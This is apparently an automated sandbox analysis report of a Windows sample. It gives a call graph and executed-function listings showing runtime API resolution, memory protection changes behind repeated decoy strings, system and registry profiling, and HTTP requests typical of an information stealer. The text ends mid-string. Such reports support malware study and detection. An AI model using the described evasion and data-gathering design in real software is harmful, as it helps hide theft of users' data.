15185->15186 15187 c623de 15186->15187 15188 c6a9b0 4 API calls 15187->15188 15189 c6240a 15188->15189 15190 c6a8a0 lstrcpy 15189->15190 15191 c62413 15190->15191 15192 c6a9b0 4 API calls 15191->15192 15193 c62432 15192->15193 15194 c6a8a0 lstrcpy 15193->15194 15195 c6243b 15194->15195 15196 c6a9b0 4 API calls 15195->15196 15197 c6245c 15196->15197 15198 c6a8a0 lstrcpy 15197->15198 15199 c62465 15198->15199 15200 c6a9b0 4 API calls 15199->15200 15201 c62484 15200->15201 15202 c6a8a0 lstrcpy 15201->15202 15203 c6248d 15202->15203 15204 c6a9b0 4 API calls 15203->15204 15205 c624ae 15204->15205 15206 c6a8a0 lstrcpy 15205->15206 15207 c624b7 15206->15207 15749 c68320 15207->15749 15209 c624d3 15210 c6a920 3 API calls 15209->15210 15211 c624e6 15210->15211 15212 c6a8a0 lstrcpy 15211->15212 15213 c624ef 15212->15213 15214 c6a9b0 4 API calls 15213->15214 15215 c62519 15214->15215 15216 c6a8a0 lstrcpy 15215->15216 15217 c62522 15216->15217 15218 c6a9b0 4 API calls 15217->15218 15219 c62543 15218->15219 15220 c6a8a0 lstrcpy 15219->15220 15221 c6254c 15220->15221 15222 c68320 17 API calls 15221->15222 15223 c62568 15222->15223 15224 c6a920 3 API calls 15223->15224 15225 c6257b 15224->15225 15226 c6a8a0 lstrcpy 15225->15226 15227 c62584 15226->15227 15228 c6a9b0 4 API calls 15227->15228 15229 c625ae 15228->15229 15230 c6a8a0 lstrcpy 15229->15230 15231 c625b7 15230->15231 15232 c6a9b0 4 API calls 15231->15232 15233 c625d6 15232->15233 15234 c6a8a0 lstrcpy 15233->15234 15235 c625df 15234->15235 15236 c6a9b0 4 API calls 15235->15236 15237 c62600 15236->15237 15238 c6a8a0 lstrcpy 15237->15238 15239 c62609 15238->15239 15785 c68680 15239->15785 15241 c62620 15242 c6a920 3 API calls 15241->15242 15243 c62633 15242->15243 15244 c6a8a0 lstrcpy 15243->15244 15245 c6263c 15244->15245 15246 c6265a lstrlen 15245->15246 15247 c6266a 15246->15247 15248 c6a740 lstrcpy 15247->15248 15249 c6267c 15248->15249 15250 c51590 lstrcpy 15249->15250 15251 c6268d 15250->15251 15795 c65190 15251->15795 15253 c62699 15253->13685 15983 c6aad0 15254->15983 15256 c55009 InternetOpenUrlA 15257 c55021 15256->15257 15258 c550a0 InternetCloseHandle InternetCloseHandle 15257->15258 15259 c5502a InternetReadFile 15257->15259 15260 c550ec 15258->15260 15259->15257 15260->13689 15984 c598d0 15261->15984 15263 c60759 15264 c6077d 15263->15264 15265 c60a38 15263->15265 15268 c60799 StrCmpCA 15264->15268 15266 c51590 lstrcpy 15265->15266 15267 c60a49 15266->15267 16160 c60250 15267->16160 15270 c607a8 15268->15270 15297 c60843 15268->15297 15271 c6a7a0 lstrcpy 15270->15271 15272 c607c3 15271->15272 15275 c51590 lstrcpy 15272->15275 15273 c60865 StrCmpCA 15276 c60874 15273->15276 15313 c6096b 15273->15313 15277 c6080c 15275->15277 15278 c6a740 lstrcpy 15276->15278 15279 c6a7a0 lstrcpy 15277->15279 15281 c60881 15278->15281 15282 c60823 15279->15282 15280 c6099c StrCmpCA 15283 c60a2d 15280->15283 15284 c609ab 15280->15284 15285 c6a9b0 4 API calls 15281->15285 15287 c6a7a0 lstrcpy 15282->15287 15283->13693 15288 c51590 lstrcpy 15284->15288 15286 c608ac 15285->15286 15289 c6a920 3 API calls 15286->15289 15290 c6083e 15287->15290 15291 c609f4 15288->15291 15293 c608b3 15289->15293 15987 c5fb00 15290->15987 15292 c6a7a0 lstrcpy 15291->15292 15295 c60a0d 15292->15295 15296 c6a9b0 4 API calls 15293->15296 15298 c6a7a0 lstrcpy 15295->15298 15299 c608ba 15296->15299 15297->15273 15300 c60a28 15298->15300 15301 c6a8a0 lstrcpy 15299->15301 16103 c60030 15300->16103 15313->15280 15635 c6a7a0 lstrcpy 15634->15635 15636 c51683 15635->15636 15637 c6a7a0 lstrcpy 15636->15637 15638 c51695 15637->15638 15639 c6a7a0 lstrcpy 15638->15639 15640 c516a7 15639->15640 15641 c6a7a0 lstrcpy 15640->15641 15642 c515a3 15641->15642 15642->14516 15644 c547c6 15643->15644 15645 c54838 lstrlen 15644->15645 15669 c6aad0 15645->15669 15647 c54848 InternetCrackUrlA 15648 c54867 15647->15648 15648->14593 15650 c6a740 lstrcpy 15649->15650 15651 c68b74 15650->15651 15652 c6a740 lstrcpy 15651->15652 15653 c68b82 GetSystemTime 15652->15653 15654 c68b99 15653->15654 15655 c6a7a0 lstrcpy 15654->15655 15656 c68bfc 15655->15656 15656->14608 15658 c6a931 15657->15658 15659 c6a988 15658->15659 15661 c6a968 lstrcpy lstrcat 15658->15661 15660 c6a7a0 lstrcpy 15659->15660 15662 c6a994 15660->15662 15661->15659 15662->14611 15663->14726 15665 c59af9 LocalAlloc 15664->15665 15666 c54eee 15664->15666 15665->15666 15667 c59b14 CryptStringToBinaryA 15665->15667 15666->14614 15666->14616 15667->15666 15668 c59b39 LocalFree 15667->15668 15668->15666 15669->15647 15670->14736 15671->14877 15672->14879 15673->14887 15802 c677a0 15674->15802 15677 c676c6 RegOpenKeyExA 15679 c676e7 RegQueryValueExA 15677->15679 15680 c67704 RegCloseKey 15677->15680 15678 c61c1e 15678->14969 15679->15680 15680->15678 15682 c61c99 15681->15682 15682->14983 15684 c61e09 15683->15684 15684->15025 15686 c67a9a wsprintfA 15685->15686 15687 c61e84 15685->15687 15686->15687 15687->15039 15689 c61efe 15688->15689 15690 c67b4d 15688->15690 15689->15053 15809 c68d20 LocalAlloc CharToOemW 15690->15809 15693 c6a740 lstrcpy 15692->15693 15694 c67bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15693->15694 15703 c67c25 15694->15703 15695 c67c46 GetLocaleInfoA 15695->15703 15696 c67d18 15697 c67d1e LocalFree 15696->15697 15698 c67d28 15696->15698 15697->15698 15699 c6a7a0 lstrcpy 15698->15699 15702 c67d37 15699->15702 15700 c6a9b0 lstrcpy lstrlen lstrcpy lstrcat 15700->15703 15701 c6a8a0 lstrcpy 15701->15703 15702->15066 15703->15695 15703->15696 15703->15700 15703->15701 15705 c62008 15704->15705 15705->15081 15707 c694b5 15706->15707 15708 c69493 GetModuleFileNameExA CloseHandle 15706->15708 15709 c6a740 lstrcpy 15707->15709 15708->15707 15710 c62091 15709->15710 15710->15096 15712 c62119 15711->15712 15713 c67e68 RegQueryValueExA 15711->15713 15712->15110 15714 c67e8e RegCloseKey 15713->15714 15714->15712 15716 c67fb9 GetLogicalProcessorInformationEx 15715->15716 15717 c67fd8 GetLastError 15716->15717 15722 c68029 15716->15722 15718 c68022 15717->15718 15727 c67fe3 15717->15727 15721 c62194 15718->15721 15724 c689f0 2 API calls 15718->15724 15721->15124 15723 c689f0 2 API calls 15722->15723 15725 c6807b 15723->15725 15724->15721 15725->15718 15726 c68084 wsprintfA 15725->15726 15726->15721 15727->15716 15727->15721 15810 c689f0 15727->15810 15813 c68a10 GetProcessHeap RtlAllocateHeap 15727->15813 15729 c6220f 15728->15729 15729->15138 15731 c689b0 15730->15731 15732 c6814d GlobalMemoryStatusEx 15731->15732 15735 c68163 __aulldiv 15732->15735 15733 c6819b wsprintfA 15734 c62289 15733->15734 15734->15152 15735->15733 15737 c687fb GetProcessHeap RtlAllocateHeap wsprintfA 15736->15737 15739 c6a740 lstrcpy 15737->15739 15740 c6230b 15739->15740 15740->15166 15742 c6a740 lstrcpy 15741->15742 15743 c68229 15742->15743 15744 c68263 15743->15744 15746 c6a9b0 lstrcpy lstrlen lstrcpy lstrcat 15743->15746 15748 c6a8a0 lstrcpy 15743->15748 15745 c6a7a0 lstrcpy 15744->15745 15747 c682dc 15745->15747 15746->15743 15747->15183 15748->15743 15750 c6a740 lstrcpy 15749->15750 15751 c6835c RegOpenKeyExA 15750->15751 15752 c683d0 15751->15752 15753 c683ae 15751->15753 15755 c68613 RegCloseKey 15752->15755 15756 c683f8 RegEnumKeyExA 15752->15756 15754 c6a7a0 lstrcpy 15753->15754 15766 c683bd 15754->15766 15757 c6a7a0 lstrcpy 15755->15757 15758 c6860e 15756->15758 15759 c6843f wsprintfA RegOpenKeyExA 15756->15759 15757->15766 15758->15755 15760 c68485 RegCloseKey RegCloseKey 15759->15760 15761 c684c1 RegQueryValueExA 15759->15761 15764 c6a7a0 lstrcpy 15760->15764 15762 c68601 RegCloseKey 15761->15762 15763 c684fa lstrlen 15761->15763 15762->15758 15763->15762 15765 c68510 15763->15765 15764->15766 15767 c6a9b0 4 API calls 15765->15767 15766->15209 15768 c68527 15767->15768 15769 c6a8a0 lstrcpy 15768->15769 15770 c68533 15769->15770 15771 c6a9b0 4 API calls 15770->15771 15772 c68557 15771->15772 15773 c6a8a0 lstrcpy 15772->15773 15774 c68563 15773->15774 15775 c6856e RegQueryValueExA 15774->15775 15775->15762 15776 c685a3 15775->15776 15777 c6a9b0 4 API calls 15776->15777 15778 c685ba 15777->15778 15779 c6a8a0 lstrcpy 15778->15779 15780 c685c6 15779->15780 15781 c6a9b0 4 API calls 15780->15781 15782 c685ea 15781->15782 15783 c6a8a0 lstrcpy 15782->15783 15784 c685f6 15783->15784 15784->15762 15786 c6a740 lstrcpy 15785->15786 15787 c686bc CreateToolhelp32Snapshot Process32First 15786->15787 15788 c6875d CloseHandle 15787->15788 15789 c686e8 Process32Next 15787->15789 15790 c6a7a0 lstrcpy 15788->15790 15789->15788 15794 c686fd 15789->15794 15792 c68776 15790->15792 15791 c6a9b0 lstrcpy lstrlen lstrcpy lstrcat 15791->15794 15792->15241 15793 c6a8a0 lstrcpy 15793->15794 15794->15789 15794->15791 15794->15793 15796 c6a7a0 lstrcpy 15795->15796 15797 c651b5 15796->15797 15798 c51590 lstrcpy 15797->15798 15799 c651c6 15798->15799 15814 c55100 15799->15814 15801 c651cf 15801->15253 15805 c67720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15802->15805 15804 c676b9 15804->15677 15804->15678 15806 c67765 RegQueryValueExA 15805->15806 15807 c67780 RegCloseKey 15805->15807 15806->15807 15808 c67793 15807->15808 15808->15804 15809->15689 15811 c68a0c 15810->15811 15812 c689f9 GetProcessHeap HeapFree 15810->15812 15811->15727 15812->15811 15813->15727 15815 c6a7a0 lstrcpy 15814->15815 15816 c55119 15815->15816 15817 c547b0 2 API calls 15816->15817 15818 c55125 15817->15818 15974 c68ea0 15818->15974 15820 c55184 15821 c55192 lstrlen 15820->15821 15822 c551a5 15821->15822 15823 c68ea0 4 API calls 15822->15823 15824 c551b6 15823->15824 15825 c6a740 lstrcpy 15824->15825 15826 c551c9 15825->15826 15827 c6a740 lstrcpy 15826->15827 15828 c551d6 15827->15828 15829 c6a740 lstrcpy 15828->15829 15830 c551e3 15829->15830 15831 c6a740 lstrcpy 15830->15831 15832 c551f0 15831->15832 15833 c6a740 lstrcpy 15832->15833 15834 c551fd InternetOpenA StrCmpCA 15833->15834 15835 c5522f 15834->15835 15836 c558c4 InternetCloseHandle 15835->15836 15837 c68b60 3 API calls 15835->15837 15843 c558d9 codecvt 15836->15843 15838 c5524e 15837->15838 15839 c6a920 3 API calls 15838->15839 15840 c55261 15839->15840 15841 c6a8a0 lstrcpy 15840->15841 15842 c5526a 15841->15842 15844 c6a9b0 4 API calls 15842->15844 15847 c6a7a0 lstrcpy 15843->15847 15845 c552ab 15844->15845 15846 c6a920 3 API calls 15845->15846 15848 c552b2 15846->15848 15852 c55913 15847->15852 15849 c6a9b0 4 API calls 15848->15849 15850 c552b9 15849->15850 15851 c6a8a0 lstrcpy 15850->15851 15853 c552c2 15851->15853 15852->15801 15854 c6a9b0 4 API calls 15853->15854 15855 c55303 15854->15855 15856 c6a920 3 API calls 15855->15856 15857 c5530a 15856->15857 15858 c6a8a0 lstrcpy 15857->15858 15859 c55313 15858->15859 15860 c55329 InternetConnectA 15859->15860 15860->15836 15861 c55359 HttpOpenRequestA 15860->15861 15863 c558b7 InternetCloseHandle 15861->15863 15864 c553b7 15861->15864 15863->15836 15865 c6a9b0 4 API calls 15864->15865 15866 c553cb 15865->15866 15867 c6a8a0 lstrcpy 15866->15867 15868 c553d4 15867->15868 15869 c6a920 3 API calls 15868->15869 15870 c553f2 15869->15870 15871 c6a8a0 lstrcpy 15870->15871 15872 c553fb 15871->15872 15873 c6a9b0 4 API calls 15872->15873 15874 c5541a 15873->15874 15875 c6a8a0 lstrcpy 15874->15875 15876 c55423 15875->15876 15877 c6a9b0 4 API calls 15876->15877 15878 c55444 15877->15878 15879 c6a8a0 lstrcpy 15878->15879 15880 c5544d 15879->15880 15881 c6a9b0 4 API calls 15880->15881 15882 c5546e 15881->15882 15883 c6a8a0 lstrcpy 15882->15883 15975 c68ead CryptBinaryToStringA 15974->15975 15976 c68ea9 15974->15976 15975->15976 15977 c68ece GetProcessHeap RtlAllocateHeap 15975->15977 15976->15820 15977->15976 15978 c68ef4 codecvt 15977->15978 15979 c68f05 CryptBinaryToStringA 15978->15979 15979->15976 15983->15256 16226 c59880 15984->16226 15986 c598e1 15986->15263 15988 c6a740 lstrcpy 15987->15988 15989 c5fb16 15988->15989 16161 c6a740 lstrcpy 16160->16161 16162 c60266 16161->16162 16163 c68de0 2 API calls 16162->16163 16164 c6027b 16163->16164 16165 c6a920 3 API calls 16164->16165 16166 c6028b 16165->16166 16167 c6a8a0 lstrcpy 16166->16167 16168 c60294 16167->16168 16169 c6a9b0 4 API calls 16168->16169 16170 c602b8 16169->16170 16227 c5988d 16226->16227 16230 c56fb0 16227->16230 16229 c598ad codecvt 16229->15986 16233 c56d40 16230->16233 16234 c56d63 16233->16234 16246 c56d59 16233->16246 16234->16246 16247 c56660 16234->16247 16236 c56dbe 16236->16246 16253 c569b0 16236->16253 16238 c56e2a 16239 c56ee6 VirtualFree 16238->16239 16241 c56ef7 16238->16241 16238->16246 16239->16241 16240 c56f41 16242 c689f0 2 API calls 16240->16242 16240->16246 16241->16240 16243 c56f26 FreeLibrary 16241->16243 16244 c56f38 16241->16244 16242->16246 16243->16241 16245 c689f0 2 API calls 16244->16245 16245->16240 16246->16229 16250 c5668f VirtualAlloc 16247->16250 16249 c56730 16251 c56743 VirtualAlloc 16249->16251 16252 c5673c 16249->16252 16250->16249 16250->16252 16251->16252 16252->16236 16254 c569c9 16253->16254 16258 c569d5 16253->16258 16255 c56a09 LoadLibraryA 16254->16255 16254->16258 16256 c56a32 16255->16256 16255->16258 16262 c56ae0 16256->16262 16263 c68a10 GetProcessHeap RtlAllocateHeap 16256->16263 16258->16238 16259 c56ba8 GetProcAddress 16259->16258 16259->16262 16260 c689f0 2 API calls 16260->16262 16261 c56a8b 16261->16258 16261->16260 16262->16258 16262->16259 16263->16261

                              Executed Functions

                              Function 00C69860 Relevance: 66.7, APIs: 33, Strings: 5, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 c69860-c69874 call c69750 663 c69a93-c69af2 LoadLibraryA * 5 660->663 664 c6987a-c69a8e call c69780 GetProcAddress * 21 660->664 665 c69af4-c69b08 GetProcAddress 663->665 666 c69b0d-c69b14 663->666 664->663 665->666 668 c69b46-c69b4d 666->668 669 c69b16-c69b41 GetProcAddress * 2 666->669 671 c69b4f-c69b63 GetProcAddress 668->671 672 c69b68-c69b6f 668->672 669->668 671->672 673 c69b71-c69b84 GetProcAddress 672->673 674 c69b89-c69b90 672->674 673->674 675 c69b92-c69bbc GetProcAddress * 2 674->675 676 c69bc1-c69bc2 674->676 675->676
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,007F24B8), ref: 00C698A1
                              • GetProcAddress.KERNEL32(74DD0000,007F2410), ref: 00C698BA
                              • GetProcAddress.KERNEL32(74DD0000,007F2458), ref: 00C698D2
                              • GetProcAddress.KERNEL32(74DD0000,007F2488), ref: 00C698EA
                              • GetProcAddress.KERNEL32(74DD0000,007F2500), ref: 00C69903
                              • GetProcAddress.KERNEL32(74DD0000,007F9288), ref: 00C6991B
                              • GetProcAddress.KERNEL32(74DD0000,007E5C50), ref: 00C69933
                              • GetProcAddress.KERNEL32(74DD0000,007E5D10), ref: 00C6994C
                              • GetProcAddress.KERNEL32(74DD0000,007F2230), ref: 00C69964
                              • GetProcAddress.KERNEL32(74DD0000,007F2278), ref: 00C6997C
                              • GetProcAddress.KERNEL32(74DD0000,007F2368), ref: 00C69995
                              • GetProcAddress.KERNEL32(74DD0000,007F2398), ref: 00C699AD
                              • GetProcAddress.KERNEL32(74DD0000,007E5E10), ref: 00C699C5
                              • GetProcAddress.KERNEL32(74DD0000,007F24A0), ref: 00C699DE
                              • GetProcAddress.KERNEL32(74DD0000,007F23B0), ref: 00C699F6
                              • GetProcAddress.KERNEL32(74DD0000,007E5C70), ref: 00C69A0E
                              • GetProcAddress.KERNEL32(74DD0000,007F23E0), ref: 00C69A27
                              • GetProcAddress.KERNEL32(74DD0000,007F23F8), ref: 00C69A3F
                              • GetProcAddress.KERNEL32(74DD0000,007E5C10), ref: 00C69A57
                              • GetProcAddress.KERNEL32(74DD0000,007F2428), ref: 00C69A70
                              • GetProcAddress.KERNEL32(74DD0000,007E5D30), ref: 00C69A88
                              • LoadLibraryA.KERNEL32(007F25C0,?,00C66A00), ref: 00C69A9A
                              • LoadLibraryA.KERNEL32(007F2530,?,00C66A00), ref: 00C69AAB
                              • LoadLibraryA.KERNEL32(007F2518,?,00C66A00), ref: 00C69ABD
                              • LoadLibraryA.KERNEL32(007F25D8,?,00C66A00), ref: 00C69ACF
                              • LoadLibraryA.KERNEL32(007F2548,?,00C66A00), ref: 00C69AE0
                              • GetProcAddress.KERNEL32(75A70000,007F2560), ref: 00C69B02
                              • GetProcAddress.KERNEL32(75290000,007F2578), ref: 00C69B23
                              • GetProcAddress.KERNEL32(75290000,007F2590), ref: 00C69B3B
                              • GetProcAddress.KERNEL32(75BD0000,007F25A8), ref: 00C69B5D
                              • GetProcAddress.KERNEL32(75450000,007E5C30), ref: 00C69B7E
                              • GetProcAddress.KERNEL32(76E90000,007F92A8), ref: 00C69B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00C69BB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: 0\~$0]~$NtQueryInformationProcess$P\~$p\~
                              • API String ID: 2238633743-2935435965
                              • Opcode ID: 274ad26377e69aa51ddd54584d67271152df7e538def57349294e53da08f0c20
                              • Instruction ID: a9021eff1613f9e5152b6442c530e5de91e04a95611e426797f4bd0c0902f6db
                              • Opcode Fuzzy Hash: 274ad26377e69aa51ddd54584d67271152df7e538def57349294e53da08f0c20
                              • Instruction Fuzzy Hash: 2EA14CB5510200AFD368EFABED8996637F9FF8C30171C453BA609A3274D6399449CBD2
                              Function 00C545C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 c545c0-c54695 RtlAllocateHeap 781 c546a0-c546a6 764->781 782 c546ac-c5474a 781->782 783 c5474f-c547a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C5460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C5479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C545DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C546B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C546C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C546CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C546AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C545D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C545C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C545E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C546D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C545F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 